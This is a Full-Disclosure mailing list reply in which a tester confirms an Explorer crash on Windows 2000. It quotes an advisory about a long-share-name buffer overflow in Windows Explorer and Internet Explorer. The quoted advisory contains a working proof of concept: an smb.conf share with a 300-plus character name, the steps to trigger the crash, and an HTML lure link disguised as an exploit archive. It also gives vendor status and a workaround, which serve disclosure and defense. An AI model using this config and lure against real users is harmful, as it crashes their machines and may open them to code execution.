Re: Microsoft's Explorer and Internet Explorer long share name buffer overflow.

[VIGOUR <vigour_vig () yahoo com>]

Just tested it on Windows98SE full patches and Win2k
Pro.. full again... 

The 98's box did not crashed.. but the 2k's explorer
hanged...


--- Rodrigo Gutierrez <rodrigo () intellicomp cl> wrote:
> Sunday afternoon is a bit boring, and weather sucks
> down here in Santiago,
> Chile so here we go...
> The vuln is attached in TXT format, I would be
> gratefull if someone could
> verify if it affects windows 2003 as well.
>
> Rodrigo.-
> > Microsoft Explorer and Internet Explorer Long
Share
> Name Buffer Overflow.
>
>
>
> Author: Rodrigo Gutierrez <rodrigo () intellicomp cl>
>
> Affected: MS Internet Explorer, MS Explorer
> (explorer.exe) 
>           Windows XP(All), Windows 2000(All)
>
> Not Tested: Windows 2003, Windows me, Windows 98,
> Windows 95
>
> Vendor Status: i notified the vendor in the
> beginning of 2002, this
>                vulnerability was supposed to be
> fixed in xp service
>                pack 1 according to the vendors
> knowledge base article
>                322857.
>
> Vendor url:
http://support.microsoft.com/default.aspx?scid=kb;en-us;322857
> Background.
>
> MS Explorer (explorer.exe) and MS Internet
> Explorer(IEXPLORE.EXE) are 
> core pieces of Microsoft Windows Operating Systems.
>
>
>
> Description
>
> Windows fails to handle long share names when
> accessing a remote 
> file servers such as samba, allowing a malicious
> server to crash the 
> clients explorer and eventually get to execute
> arbitrary code in the 
> machine as the current user (usually with
> Administrator rights in windows
> machines).
>
>
>
> Analysis
>
> In order to exploit this, an attacker must be able
> to get a user to connect 
> to a malicious server which contains a share name
> equal or longer than 300
> characters, windows wont allow you to create such a
> share, but of course samba 
> includes the feature ;).   After your samba box is
> up and running create a 
> share in you smb.conf :
>
>
>
> #------------ CUT HERE -------------
[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> comment = Area 51
> path = /tmp/testfolder
> public = yes
> writable = yes
> printable = no
> browseable = yes
> write list = @trymywingchung
>
> #------------ CUT HERE -------------
>
>
> After your server is up, just get to your windows
> test box and get to the
> start menu > run > \\your.malicious.server.ip.,
> plufff, explorer will crash
> :).
>
> Social Engineering:
>
> <a href="\\my.malicious.server.ip">Enter My 0day
> sploit archive</a>
>  
>
>
> Workaround.
>
> From your network card settings disable the client
> for Microsoft networks 
> until a real fix for this vulnerability is
> available.


=====
VIGOUR




        
                
__________________________________
Do you Yahoo!?
Win a $20,000 Career Makeover at Yahoo! HotJobs  
http://hotjobs.sweepstakes.yahoo.com/careermakeover 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html